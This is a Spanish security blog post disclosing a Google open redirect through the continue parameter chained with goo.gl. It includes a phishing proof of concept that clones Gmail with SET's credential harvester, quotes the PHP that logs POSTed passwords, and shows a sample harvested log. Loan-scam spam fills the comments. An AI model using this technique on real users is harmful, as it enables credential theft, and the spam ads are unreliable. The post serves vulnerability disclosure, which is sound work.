11 julio 2015

Google Open Redirect + SET

Buenas a todos!

 Hoy me gustaría enseñaros un fallo (que ya adelanto que google no lo ve como tal ya que dice que esta “Out of Scope”) que a mi parecer puede ser usado para fines maliciosos si se utiliza de manera malintencionada.

 En concreto el fallo es un Open Redirect. Este fallo como muchos sabréis esta recogido en la OWASP e incluso fue un fallo recogido en este proyecto dentro del TOP 10 en el 2013.

 Bueno... vamos a ello! Si vamos a https://myaccount.google.com y miramos el source de la página veremos la siguiente redirección:




Dicha redirección es interesante ya que según parece una vez finalizado el formulario seremos redirigidos de nuevo a http://myaccount.google.com.

Intentamos primero modificar el parametro continue con “http://www.example.com”. Esto nos mostrará un error 404 y nos dirá que la página no existe:


Es muy pronto para rendirnos aún... según podemos ver la redirección se hace, pero seguramente sea únicamente a dominios de google... para poder aprovechar esto vamos a usar el servicio que nos permite acortar URLs que nos permite google: http://goo.gl

Una vez creada la URL vamos a intentar utilizar tal que así:

https://security.google.com/settings/security/secureaccount?continue=http://goo.gl/SAQ0Gk

¡Ahora sí! Una vez terminado el formulario somos redirigidos a la página que hayamos puesto en http://goo.gl

Como podéis ver, realizando el ataque de esta manera hemos podido redirigir a una página externa usando un servicio de google.

Este escenario podría ser perfecto para una campaña de phishing donde por ejemplo un atacante se hiciera pasar por el servicio técnico de google pidiendonos que verifiquemos la seguridad de la cuenta para finalmente acabar en una página de phishing con el fin de robarnos los credenciales o ser redirigido a un exploit kit y comprometer nuestra máquina.

Para ver este posible escenario vamos a realizar una prueba de concepto. Par ello usaremos:

[*] Víctima
  • Windows

[*] Atacante
  • Linux
  • Set Toolkit
  • Dominio Fraudulento

Para poder realizar esta poc vamos a usar SET y clonar la página de gmail.com. Para ello nos valdremos del ataque “Credential Harvester Attack Method” que nos permitirá clonar dicha página y una vez la víctima inserte su usuario/contraseña será redirigido a la página original.

¿Cómo realiza esto SET? Pues es tan fácil como la siguiente linea de código que contiene post.php:


<?php $file = 'harvester_2015-06-13 16:16:34.695876.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=https://accounts.google.com" />

Como podéis observar hace un put de los parámetros POST introducidos por el usuario dentro de un fichero que se genera el mismo y posteriormente hace un refresh de la página y redirige a “https://accounts.google.com".

En un entorno real, este dominio debería estar registrado y controlado por el atacante pero para nuestra poc he modificado el fichero hosts y he puesto el dominio “joogle.com” (podéis usar el que más os guste) que redirigirá dichas peticiones a la máquina del atacante.

Un vez realizado todo esto solo falta enviar un email a la víctima o cualquier otra vía de ingeniería social y esperar ver si finalmente la víctima ingresa sus datos en nuestra página de phishing.

Sí todo va bien veremos en el fichero llamado harvester_* lo siguiente:
Array
(
[GALX] => aePsgdFkA-A
[continue] => https://accounts.google.com/ManageAccount
[followup] => https://accounts.google.com/ManageAccount
[_utf8] => ☃
[bgresponse] => !YmFCjHSy8J4p7k9EfsdhbaflTtoPAAQeCP83CgBlXtGQrSD2cA002GKnfiHDe42cdD6z91d8rPg2oQRPJHJW3IJ2gdb5VjT0sCIpNWdMAcu9rUwnc3rKcKvB5-OFAtZSfy19yJ5zXCzP67yOLOeMrb3uDXnzBQVIkBAzt471DHB5QSpcqAA7xpQv4Z2HRIj12JJdLzQ
[pstMsg] => 1
[dnConn] =>
[checkConnection] =>
[checkedDomains] => youtube
[Email] => user@gmail.com
[Passwd] => passw0rd
[signIn] => Sign in
[PersistentCookie] => yes
[rmShown] => 1

Y de esta manera, usando un dominio legítimo de google y su servicio goo.gl podemos llegar a ser víctimas de un robo de credenciales que a mi parecer se podría evitar restringiendo goo.gl al igual que se han restringido todos aquellos dominios no pertenecientes a google.

Vosotros que opináis, ¿Es un fallo? ¿No lo es? … se aceptan críticas :)

 Saludos!

Artículo cortestía de Sergio Galán @NaxoneZ

9 comments :

an@ni.mo dijo...

Es una vulnerabilidad, pero Google siempre lo ha excluido de su programa de recompensas. Aquí tienes otro ejemplo: https://www.google.com/search?source=whoismrrobot.com&hl=whoismrrobot.com&q=whoismrrobot.com&btnG=whoismrrobot.com&btnI=whoismrrobot.com

Sholaclark Deleivery dijo...

.¿Necesita un préstamo urgente o servicio financiero? Póngase en contacto con financialdepartment.online@gmail.com

Elena Camacho dijo...

Hola a todos aquí. Lo que la señora Camacho dijo que es muy cierto, aunque yo no lo sepa ella. Experimenté de primera mano también. Fue esta organización llamada firma préstamo Stella René (SRLF) que realmente me ayudó a pagar mis cuentas médicas cuando yo estaba en necesidad de dinero porque soy viuda. Un amigo de mi también me dirigió a ellos. Cuando estaba a punto de hacer una operación importante y yo no tenía dinero en ese momento, vinieron a mi rescate y en menos de 40 minutos, conseguí mi préstamo. Pero decir la verdad, yo estaba nerviosa y asustada al principio, porque he estado estafado dos veces. Pero cuando me armé de valor y seguir sus políticas de préstamo, junto con mi consejo amigos, al final me encontré sonriendo. Si no fuera por ellos, tal vez me habría sido muerto. Incluso he dado otro préstamo de ellos empezar mi negocio después de mi recuperación, que yo también estoy pagando atrás. Mi único consejo es que ahora cualquier organismo que está realmente en necesidad de préstamo debe ponerse en contacto con su correo electrónico a través de: mrsstellareneloanfirm@hotmail.com y obtener un préstamo de ellos. Gracias.

Elena Camacho

Axn KL dijo...

y por donde puedo descargar ese programa

Axn KL dijo...

sted por donde descargo ese programa

Tina Coka dijo...

¿Necesita un préstamo que damos préstamos a baja tasa de interés del 2% Damos préstamos a cualquier estábamos en la palabra Si está interesado, póngase en contacto con nosotros a través del correo electrónico: tinacoka@outlook.com para más información

nino emmanuel dijo...

Atención !!!

¿Tiene usted un mal crédito?

¿Necesita dinero para pagar las cuentas?

¿Es necesario poner en marcha un nuevo negocio?

¿Tiene proyecto inacabado a la mano debido a la mala financiación?

¿Necesita dinero para invertir en un área de especialización que se beneficiará usted? y no sabes qué hacer.

Yo soy el señor Maleek Johnson, un prestamista de dinero privado. Dar préstamos con una tasa de interés del 3% anual y dentro de la cantidad de 1.000,00 a 10,000,000.00 como la oferta de préstamo. 100% Financiación del proyecto con los préstamos garantizados y no garantizados están disponibles. Estamos avalados en dar servicios financieros a nuestros numerosos clientes en todo el mundo. Con nuestros paquetes flexibles de préstamo, los préstamos pueden ser procesados ​​y los fondos transferidos al prestatario en el menor tiempo posible. Operamos bajo términos claros y comprensibles y ofrecemos préstamos de todo tipo a los clientes interesados, firmas, empresas y todo tipo de organizaciones empresariales, particulares e inversores de bienes raíces. Sólo complete el siguiente formulario y volver a nosotros como esperamos su respuesta rápida e inmediata. CORREO ELECTRÓNICO: naleekfinancials1@outlook.com

Ofrecemos los siguientes préstamos a continuación,

* Préstamos personales [seguro y sin garantía]

* Préstamos de negocios [seguro y sin garantía]

* préstamos combinados

* Los estudiantes préstamos

* Auto Loan Refinanciar

* Préstamos de consolidación y tantos otros.

Interesado solicitante debe por favor llene nuestro formulario de solicitud a continuación.

PRIMERA INFORMACIÓN NECESARIA

Nombre Completo ..........

Edad .......

Número de teléfono personal .......

País ......

Email ............

Dirección ........

Estado .....

¿Ha aplicado antes? .....

Estado Civil ............

El monto del préstamo necesario como préstamo ............

Préstamo Duración .......

Ocupación ........

Ingreso Mensual ........

¿Entiende usted Inglés? ..........

En reconocimiento a este correo, podemos comenzar con el procesamiento de su préstamo. No hay más que ganar al obtener un préstamo de esta empresa.

Saludos,

Maleek.

Mark Agoni dijo...

hola, qué necesita un préstamo para pagar sus facturas o resolver cualquier tipo de problema financiero, la amabilidad de ponerse en contacto conmigo ahora a través de correo electrónico: johnlutherloanfirm1@outlook.com
ofrezco todo tipo de préstamo.
gracias

Jessica Hook dijo...

Buen Día !!

Soy Mis Nancy Leonard, una buena reputación, legítimo y un dinero acreditado
Prestamista. Quiero utilizar este medio para informarle de que i prestar asistencia fiable beneficiario como voy a estar encantados de ofrecerle un préstamo a una tasa de interés del 2% a individuos confiables.

Servicios prestados incluyen:

* Mejoras Para El Hogar
* Préstamos Inventor
* Préstamos de coches
* Préstamo de Consolidación de Deuda
* Línea de crédito
* Segundo Préstamo
* Préstamos Comerciales
* Préstamos Personales
* Préstamos Internacional.

Por favor escriba de nuevo si está interesado.
Tras la respuesta, se le enviará por correo un formulario de solicitud de préstamo para llenar. (No hay seguridad social y sin verificación de crédito, 100% Garantizado!) Estoy deseando haberme permitido estar al servicio de usted. Puedes ponerte en contacto conmigo a través de e-mail:
ptlenders@yahoo.com
Atentamente,
Señorita Nancy Leonard (MD).